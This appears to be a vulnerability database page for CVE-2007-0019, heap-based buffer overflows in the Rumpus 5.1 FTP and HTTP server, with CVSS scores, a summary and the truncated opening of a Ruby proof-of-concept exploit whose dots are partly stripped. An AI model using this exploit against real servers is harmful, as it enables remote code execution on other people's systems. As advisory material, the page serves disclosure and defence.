6.5
CVSSv2

CVE-2007-0019

Published: 19/01/2007 Updated: 29/07/2017
CVSS v2 Base Score: 6.5 | Impact Score: 6.4 | Exploitability Score: 8
VMScore: 655
Vector: AV:N/AC:L/Au:S/C:P/I:P/A:P

Vulnerability Summary

Multiple heap-based buffer overflows in rumpusd in Rumpus 5.1 and previous versions (1) allow remote authenticated users to execute arbitrary code via a long LIST command and other unspecified requests to the FTP service, and (2) allow remote malicious users to execute arbitrary code via unspecified requests to the HTTP service.

Vulnerable Product Search on Vulmon Subscribe to Product

maxum development corporation rumpus ftp server

Exploits

#!/usr/bin/ruby # Copyright (c) Lance M Havok <lmh [at] info-pullcom> # Kevin Finisterre <kf_lists [at] digitalmunitioncom> # # Proof of concept for issues described in MOAB-18-01-2007 require 'net/ftp' require 'socket' bugselected = (ARGV[0] || 0)to_i target_host = (ARGV[1] || "localhost") target_user = (ARGV[2] | ...